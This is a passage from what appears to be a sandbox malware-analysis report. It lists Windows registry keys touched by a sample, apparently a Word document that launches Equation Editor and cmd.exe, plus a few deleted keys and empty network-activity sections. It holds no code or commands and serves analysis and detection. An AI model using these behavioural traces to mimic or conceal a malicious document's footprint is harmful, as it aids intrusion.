  570. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
  571. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
  572. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General",
  573. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Zoom",
  574. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\CustomZoom",
  575. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ShowAll",
  576. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\Version",
  577. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ForceOpen",
  578. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDocked",
  579. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarShown",
  580. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\ToolbarDockPos",
  581. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\General\\MTUpgradeDialog",
  582. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes",
  583. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Full",
  584. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Script",
  585. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\ScriptScript",
  586. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\Symbol",
  587. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Sizes\\SubSymbol",
  588. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing",
  589. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LineSpacing",
  590. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixRowSpacing",
  591. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MatrixColSpacing",
  592. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SuperscriptHeight",
  593. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubscriptDepth",
  594. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimHeight",
  595. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimDepth",
  596. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\LimLineSpacing",
  597. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\NumerHeight",
  598. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\DenomDepth",
  599. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarOver",
  600. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FractBarThick",
  601. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SubFractBarThick",
  602. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\FenceOver",
  603. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\SpacingFactor",
  604. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\MinGap",
  605. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\RadicalGap",
  606. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\EmbellGap",
  607. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Spacing\\PrimeHeight",
  608. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts",
  609. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Text",
  610. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Function",
  611. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Variable",
  612. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\LCGreek",
  613. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\UCGreek",
  614. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Symbol",
  615. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Vector",
  616. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\Number",
  617. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User1",
  618. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Fonts\\User2",
  619. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows",
  620. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\EquationWindow",
  621. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\SpacingWindow",
  622. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\TextLanguage",
  623. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options\\Windows\\MathLanguage",
  624. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  625. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Debug",
  626. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\Debug\\ExceptionRecord",
  627. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
  628. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
  629. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  630. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
  631. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\OfficeSoftwareProtectionPlatform\\ServiceSessionId",
  632. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  633. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  634. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\NHRTimes"
  635.  
  636.  
  637. * Deleted Registry Keys:
  638. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
  639. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\f=q",
  640. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTT",
  641. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
  642. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
  643.  
  644.  
  645. * DNS Communications:
  646.  
  647. * Domains:
  648.  
  649. * Network Communication - ICMP:
  650.  
  651. * Network Communication - HTTP:
  652.  
  653. * Network Communication - SMTP:
  654.  
  655. * Network Communication - Hosts:
  656.  
  657. * Network Communication - IRC: